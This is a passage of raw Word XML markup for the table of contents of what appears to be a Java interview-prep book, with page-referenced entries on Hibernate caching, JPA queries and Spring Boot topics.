        </w:p>
        <w:p w14:paraId="425F559F" w14:textId="61FC4A8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7867772 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>744</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E649F9C" w14:textId="2EE7220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ibernate Caching?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867773 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>745</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="554BFE42" w14:textId="406A6C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7867774 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>745</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F661AF8" w14:textId="44733C1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7867775 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>746</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B2572A2" w14:textId="596858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7867776 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>747</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16ABA930" w14:textId="5BA7F98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7867777 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>748</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5286657C" w14:textId="4221AA5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7867778 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>748</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08F03817" w14:textId="58EE077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7867779 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>749</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02A48F5E" w14:textId="36FEB3E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7867780 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>750</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E1CC7C9" w14:textId="2496726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7867781 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>751</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31296488" w14:textId="0CD3FA0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JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867782 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>753</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C027F37" w14:textId="1A21B8B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7867783 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>754</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26D7113C" w14:textId="75F958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7867784 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>755</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23BD03BD" w14:textId="39837C3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7867785 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>757</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25453471" w14:textId="67240DD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7867786 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>759</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AF9912A" w14:textId="65F1FBE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7867787 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>760</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0342E85B" w14:textId="7DAFAE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7867788 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>762</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38D89458" w14:textId="1373D32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7867789 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>765</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67BFD108" w14:textId="5D2389E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QL, JPQL and Native query?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867790 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>766</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44C30150" w14:textId="76187A8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7867791 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>767</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08163900" w14:textId="3CDD0ED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7867792 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>769</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57956DCB" w14:textId="43E0FE12"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793" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring Boot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867793 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>771</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AA1F8D0" w14:textId="28D8F7D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7867794 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>771</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52D304E6" w14:textId="4116C3F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internal working of Spring Boot application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867795 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>771</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="046FD462" w14:textId="56775A5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7867796 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>773</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51336B7F" w14:textId="0A07979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7867797 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>774</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CAFD44F" w14:textId="681452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7867798 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>774</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4070A720" w14:textId="0F47B36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7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7867799 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>775</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CC85AF4" w14:textId="3446BA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7867800 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>776</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D5624CB" w14:textId="5CEE3B3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7867801 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>777</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CCE7E01" w14:textId="0ACB0D3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7867802 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>778</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38C4A263" w14:textId="2D1FA21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7867803 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>779</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A968861" w14:textId="0510B74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7867804 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>782</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BFAD7F7" w14:textId="661267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use of @Transient in spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867805 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>785</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="513BF9B1" w14:textId="6C29AB2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types of transaction propagation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867806 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>786</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04E6E8C6" w14:textId="7F3C68C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7867807 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>788</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="297CB5DE" w14:textId="1C3E41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7867808 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>789</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3059D97F" w14:textId="17FDA1E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7867809 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>792</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
